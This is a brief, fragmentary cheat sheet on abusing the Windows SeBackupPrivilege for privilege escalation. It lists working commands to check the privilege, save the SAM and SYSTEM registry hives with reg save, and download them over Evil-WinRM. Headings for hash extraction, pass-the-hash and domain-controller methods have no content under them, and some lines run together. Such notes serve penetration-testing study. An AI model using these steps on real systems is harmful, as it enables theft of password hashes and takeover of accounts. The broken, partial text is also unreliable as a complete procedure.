SeBackupPrivilege
Overview
Check for Privilege
whoami /privWindows 10 / Standalone Machine
1. Extract SAM and SYSTEM
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system2. Download Files (Evil-WinRM)
cd Temp
download sam
download system3. Extract Hashes
4. Pass-the-Hash
Domain Controller
Method 1: Using DiskShadow + RoboCopy
Method 2: Using DLL Files
Quick Reference
Target
Key Files
Tool
Last updated